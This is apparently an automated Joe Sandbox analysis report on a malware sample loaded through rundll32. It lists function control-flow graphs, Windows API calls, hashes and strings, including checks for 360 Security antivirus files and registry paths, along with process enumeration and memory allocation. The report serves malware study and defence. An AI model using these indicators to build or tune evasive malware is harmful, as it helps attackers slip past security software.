                                                                  control_flow_graph 107 180070044-1800700c2 108 1800700c7-1800700c9 107->108 109 1800700cd-1800700d8 108->109 109->109 110 1800700da-1800700dd 109->110 110->108 111 1800700df-1800700e3 110->111 112 1800701a6 111->112 113 1800700e9-1800700fa 111->113 115 1800701aa-1800701fc call 1800704f0 * 3 VirtualAlloc 112->115 114 1800700fd-18007010a 113->114 116 180070118-18007011d 114->116 117 18007010c-180070116 114->117 119 180070120-18007012a 116->119 117->116 117->117 119->119 121 18007012c-18007012f 119->121 123 180070131-180070139 121->123 124 18007018f-180070195 121->124 128 18007013c-18007014a 123->128 124->114 127 18007019b-18007019e 124->127 127->115 130 1800701a0-1800701a4 128->130 131 18007014c-180070156 128->131 130->115 131->131 132 180070158-18007015b 131->132 132->130 133 18007015d-18007016a 132->133 134 180070171-180070179 133->134 135 18007016c 133->135 136 180070180-180070184 134->136 137 18007017b 134->137 135->134 136->124 138 180070186-18007018d 136->138 137->136 138->128
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: )RxR$MN(U$S5Xl$k$pOdy$w
                                                                  • API String ID: 4275171209-2056616801
                                                                  • Opcode ID: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
                                                                  • Instruction ID: 4deb1cea13ac9b666c555f1b3f310a4baaf57dd73fee47670c94506e3a1fa1fc
                                                                  • Opcode Fuzzy Hash: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
                                                                  • Instruction Fuzzy Hash: 78413772705648C6EBA68F21E004B9E7BB1F348BC8FA4C115EE4947B89CB7EC649C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB733AC Relevance: 9.2, APIs: 6, Instructions: 164COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 139 1fb3ab733ac-1fb3ab73402 call 1fb3ab730d0 142 1fb3ab7340b-1fb3ab7341b call 1fb3ab73250 139->142 143 1fb3ab73404-1fb3ab73406 139->143 147 1fb3ab73421-1fb3ab7345c call 1fb3ab7bc64 call 1fb3ab7bb2c call 1fb3ab76b9c * 2 call 1fb3ab77588 142->147 148 1fb3ab7371c 142->148 144 1fb3ab7371e-1fb3ab73725 143->144 159 1fb3ab73712-1fb3ab73717 call 1fb3ab77b40 147->159 160 1fb3ab73462-1fb3ab7349f call 1fb3ab7bc64 call 1fb3ab7bb2c call 1fb3ab76b9c call 1fb3ab77504 147->160 148->144 159->148 170 1fb3ab734a1-1fb3ab734a3 160->170 171 1fb3ab734a8-1fb3ab734bf call 1fb3ab7ae78 160->171 170->144 174 1fb3ab734c1-1fb3ab734ce 171->174 175 1fb3ab734d0-1fb3ab734d8 171->175 176 1fb3ab734dd-1fb3ab734f7 wsprintfW 174->176 175->176 177 1fb3ab734fd-1fb3ab73514 call 1fb3ab7ae78 176->177 178 1fb3ab73597-1fb3ab735ae call 1fb3ab7ae78 176->178 185 1fb3ab73516-1fb3ab73523 177->185 186 1fb3ab73525-1fb3ab7352d 177->186 183 1fb3ab735b0-1fb3ab735bd 178->183 184 1fb3ab735bf-1fb3ab735c7 178->184 187 1fb3ab735cc-1fb3ab735f6 wsprintfW call 1fb3ab7ae78 183->187 184->187 188 1fb3ab73532-1fb3ab73561 wsprintfW call 1fb3ab7ae78 185->188 186->188 193 1fb3ab735f8-1fb3ab73605 187->193 194 1fb3ab73607-1fb3ab7360f 187->194 195 1fb3ab73572-1fb3ab7357a 188->195 196 1fb3ab73563-1fb3ab73570 188->196 198 1fb3ab73614-1fb3ab73639 wsprintfW 193->198 194->198 197 1fb3ab7357f-1fb3ab73592 wsprintfW 195->197 196->197 199 1fb3ab7363f-1fb3ab736aa call 1fb3ab73728 call 1fb3ab77b40 * 3 call 1fb3ab73c2c call 1fb3ab73a24 call 1fb3ab7ad34 197->199 198->199 214 1fb3ab736ac-1fb3ab736c5 call 1fb3ab7ba98 199->214 215 1fb3ab73703-1fb3ab7370b ExitProcess 199->215 218 1fb3ab736ea-1fb3ab736f4 call 1fb3ab7b400 214->218 219 1fb3ab736c7-1fb3ab736e5 call 1fb3ab7ba98 * 2 214->219 215->159 223 1fb3ab736f9-1fb3ab736fe call 1fb3ab77b40 218->223 219->218 223->215
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
                                                                  • Instruction ID: 96aad39a2267727e0060e6dd7d2f80888f5da6cd310884b1ea9d12524734d23b
                                                                  • Opcode Fuzzy Hash: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
                                                                  • Instruction Fuzzy Hash: 5891343D65DB8695EA50DB14F4D03EAB368FF84380F600035E68E426A9FFBAD545CB12
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB73A24 Relevance: 9.1, APIs: 6, Instructions: 110fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
                                                                  • Instruction ID: 2dc8a80f24ce7fb32ad7ecbba018f9b1ed19a7e6ad5dfc0d06004ce61af44bc4
                                                                  • Opcode Fuzzy Hash: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
                                                                  • Instruction Fuzzy Hash: 6851663D64CB8182E750DB18F4903AAB764F7C57A4F200225EAD947BE8EFBAD444CB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB73868 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 269 1fb3ab73868-1fb3ab7388f call 1fb3ab7ae1c call 1fb3ab76328 274 1fb3ab73891-1fb3ab73896 269->274 275 1fb3ab7389b-1fb3ab738a2 call 1fb3ab73074 269->275 276 1fb3ab73a1a-1fb3ab73a21 274->276 279 1fb3ab738ae-1fb3ab738bf call 1fb3ab78560 call 1fb3ab78820 275->279 280 1fb3ab738a4-1fb3ab738a9 275->280 285 1fb3ab738d2-1fb3ab738da call 1fb3ab78820 279->285 286 1fb3ab738c1-1fb3ab738c6 279->286 280->276 290 1fb3ab738ed-1fb3ab7390e GetCurrentProcess IsWow64Process 285->290 291 1fb3ab738dc-1fb3ab738e1 285->291 286->285 287 1fb3ab738c8-1fb3ab738cd 286->287 287->276 293 1fb3ab73910-1fb3ab73915 290->293 294 1fb3ab7391a-1fb3ab73921 call 1fb3ab768e8 290->294 291->290 292 1fb3ab738e3-1fb3ab738e8 291->292 292->276 293->276 297 1fb3ab7392d-1fb3ab73941 call 1fb3ab7ae78 294->297 298 1fb3ab73923-1fb3ab73928 294->298 301 1fb3ab7394f-1fb3ab73954 297->301 302 1fb3ab73943-1fb3ab7394d 297->302 298->276 303 1fb3ab73959-1fb3ab73977 CreateMutexW 301->303 302->303 304 1fb3ab7398d-1fb3ab7399a 303->304 305 1fb3ab73979-1fb3ab7398b GetLastError 303->305 304->276 305->304 306 1fb3ab7399c-1fb3ab739b3 GetModuleHandleW call 1fb3ab7463c 305->306 309 1fb3ab739bc-1fb3ab739c3 call 1fb3ab76988 306->309 310 1fb3ab739b5-1fb3ab739ba 306->310 313 1fb3ab739cc-1fb3ab739d3 call 1fb3ab76864 309->313 314 1fb3ab739c5-1fb3ab739ca 309->314 310->276 317 1fb3ab739dc-1fb3ab739e8 call 1fb3ab7d134 call 1fb3ab7378c 313->317 318 1fb3ab739d5-1fb3ab739da 313->318 314->276 323 1fb3ab739fb 317->323 324 1fb3ab739ea-1fb3ab739f4 call 1fb3ab733ac 317->324 318->276 326 1fb3ab73a05-1fb3ab73a16 call 1fb3ab76250 323->326 327 1fb3ab739f9 324->327 326->276 327->326
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
                                                                  • Instruction ID: 9b4f0520e9bef21039ff8ca5616d7f291f6d4329e34d162e1445376ecdb4b353
                                                                  • Opcode Fuzzy Hash: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
                                                                  • Instruction Fuzzy Hash: AE41403D98C68385F6605B64D4C53F976ACBF44368F300335E4AA466D5FBBAE5048B23
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB78820 Relevance: 6.0, APIs: 4, Instructions: 28processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 420147892-0
                                                                  • Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                                                                  • Instruction ID: ef54ab91179a74bbda44cbc2c78dd8a87b0c06a922f005479bd6c45b45fad237
                                                                  • Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                                                                  • Instruction Fuzzy Hash: FE01623EA5C681C3E7A0CB15E48436AB768FBC8788F540225A58E86668EF3CD545CB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800701F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 83memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 369 1800701f0-180070219 VirtualAlloc 372 18007021c-180070251 369->372 372->372 373 180070253-180070272 VirtualAlloc 372->373 374 180070278-18007029a 373->374 375 1800704da 373->375 377 1800702b8-1800702d7 374->377 378 18007029c-1800702a2 374->378 376 1800704dc-1800704ef 375->376 377->375 380 1800702dd-1800702e1 377->380 379 1800702a5-1800702b6 378->379 379->377 379->379 381 1800702e4-1800702ea 380->381 382 1800702fc-1800702ff 381->382 383 1800702ec 381->383 384 180070311-180070326 382->384 385 180070301-18007030b 382->385 383->375 388 180070328 384->388 389 180070340-18007034d 384->389 385->384 386 18007030d 385->386 386->384 390 18007032b-18007033e 388->390 389->381 391 18007034f-180070352 389->391 390->389 390->390 391->375 392 180070358-180070360 391->392 393 180070366 392->393 394 180070414-18007041e 392->394 394->375 395 180070424-18007042b 394->395 396 180070487-180070494 395->396 397 18007042d 395->397 399 180070496-1800704a2 396->399 400 1800704bc-1800704d8 396->400 398 180070431-18007043f 397->398 398->375 405 180070445-18007044b 398->405 401 1800704b4-1800704ba 399->401 400->375 400->376 401->400 403 1800704a4-1800704b0 401->403 403->401 407 180070478-18007047c 405->407 408 18007047e-180070485 407->408 409 18007044d-180070460 407->409 408->396 408->398 410 180070467-18007046b 409->410 411 180070462-180070465 409->411 412 18007046e-180070474 410->412 411->412 412->407
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: S5Xl
                                                                  • API String ID: 4275171209-3963265540
                                                                  • Opcode ID: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
                                                                  • Instruction ID: 8627bea6adcabeb617a02013d3036f8ce64dc83beb87997f1cd45eda72222d63
                                                                  • Opcode Fuzzy Hash: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
                                                                  • Instruction Fuzzy Hash: B63146733116A886CB56CF75A548FEC3BAAF718BC8F5281268E4D07B55DE39C11AC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB7B400 Relevance: 4.5, APIs: 3, Instructions: 41processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 2922976086-0
                                                                  • Opcode ID: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
                                                                  • Instruction ID: ca8f21d2fc03cd20ce50ad8eab8437923208b666bc88fabfc3a9161fbfdd11df
                                                                  • Opcode Fuzzy Hash: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
                                                                  • Instruction Fuzzy Hash: 3811FE3A55C781C7E760CB14F4847ABF7A4F7C4354F604525E68982A98EBBDD548CF01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB789D4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Volume$Find$CloseFirstInformation
                                                                  • String ID:
                                                                  • API String ID: 586543143-0
                                                                  • Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                                                                  • Instruction ID: f7bbd442598c3f86f436ba9d5db9db5147e9c90ebc7f2463605873eb16f778f8
                                                                  • Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                                                                  • Instruction Fuzzy Hash: 91111C3E55CB8186E7609B54F4C43EAB3A8F784350FA00236E29942AE8EF7DD549CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB73C2C Relevance: 4.5, APIs: 3, Instructions: 15synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEventHandleMutexRelease
                                                                  • String ID:
                                                                  • API String ID: 3391745777-0
                                                                  • Opcode ID: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
                                                                  • Instruction ID: a73f9458537115b9fa03c3464298297fce7e5a1901333e0f1684d45c9c471196
                                                                  • Opcode Fuzzy Hash: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
                                                                  • Instruction Fuzzy Hash: CEF04C3C98978281E6909B19E8943A4A77CBF88B88F640125D44A42275EF7DA455C616
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180070210 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: S5Xl
                                                                  • API String ID: 4275171209-3963265540
                                                                  • Opcode ID: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
                                                                  • Instruction ID: cfc6a34ce132622bae8ceb4dc72cd21c5819cecda536a8dbeac765b14806de91
                                                                  • Opcode Fuzzy Hash: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
                                                                  • Instruction Fuzzy Hash: 691106723217A885CE61CF35A54CFA82BA9F71CFC8F1691158E4D13B01DE39C019C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB788F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentFormatFreeMemoryPathUserVirtual
                                                                  • String ID:
                                                                  • API String ID: 2593304397-0
                                                                  • Opcode ID: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
                                                                  • Instruction ID: c20a293f8c99b864851af792473970c71e4d7cc96b0413037156c47252766f77
                                                                  • Opcode Fuzzy Hash: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
                                                                  • Instruction Fuzzy Hash: 8C21363EA5C68391EA609B11E4D03FA6368FBD4384F601535A6CE426E9FF6ED5448B02
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB77414 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
                                                                  • Instruction ID: ef256bddb079c5ae259b8b4714ab1ed82fa3864057e49dc814eb40cad9b64047
                                                                  • Opcode Fuzzy Hash: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
                                                                  • Instruction Fuzzy Hash: B1E0923DE7C69287E3A08B34E8803BA6A58F783350F700530A9D2811D4EB69D0949B02
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800701E0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
                                                                  • Instruction ID: fdd3b53fd5ef90cd25e79b7e67ac9ef4d4291e3d36f58b03b6eae1744e84b5e2
                                                                  • Opcode Fuzzy Hash: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
                                                                  • Instruction Fuzzy Hash: 42C01262B0D6D049D7056B7420A469E2FB16762789B05405A4B4163E69C8388206C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 000000018004A650 Relevance: 79.3, APIs: 37, Strings: 8, Instructions: 513filesleepmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Filememmove$CloseHandlememset$Local$CreateCurrentDescriptorFreeMappingProcessSecurityViewWindow$AllocAppendCountDaclExecuteFindForegroundInitializeModuleNameObjectPathShellSingleSizeSleepThreadTickUnmapWaitrandsrandwsprintf
                                                                  • String ID: %u_%d_%d_%d_%u$..\360DeskAna64.exe$/%s %s %u$Progman$Program manager$open$se1$se2
                                                                  • API String ID: 1121195023-828389715
                                                                  • Opcode ID: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                  • Instruction ID: 9c018b3ec5208d5dc303fe800ce77a7618bf785d2afa65f14d01c037d361c4e0
                                                                  • Opcode Fuzzy Hash: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                  • Instruction Fuzzy Hash: D332CC72604B8886FB96CF25D8803DD73B1F789BD8F528116EA5947BA4DF38C649C708
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180010580 Relevance: 61.5, APIs: 25, Strings: 10, Instructions: 237registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$FilePath$Exists$BackslashCloseModuleNameOpenQueryValue
                                                                  • String ID: %s\%s$360SkinMgr.exe$360leakfixer.exe$Path$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe$hipsver.dll$safemon\360Cactus.tpi$safemon\FreeSaaS.tpi$safemon\pedrver.dll
                                                                  • API String ID: 4260417939-4002867936
                                                                  • Opcode ID: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                  • Instruction ID: bf4960b57fd98bc25e9fd953caee1d48b1d668c6bea79cfa729634ea3028d897
                                                                  • Opcode Fuzzy Hash: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                  • Instruction Fuzzy Hash: BCB13D31614E8895EBA2DB21EC543DA63A4F78DBC4F908116FA9D87A95EF39C70DC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001ECF4 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 323fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$Pointer$CloseHandlememmove$??3@$ByteCharCreateMultiSizeWide_wcslwrwcschr
                                                                  • String ID: 9
                                                                  • API String ID: 2469906296-2366072709
                                                                  • Opcode ID: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                  • Instruction ID: b16b18eef39a39b515becb99aaa5640e1c6952976385d86e077c0efac659451c
                                                                  • Opcode Fuzzy Hash: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
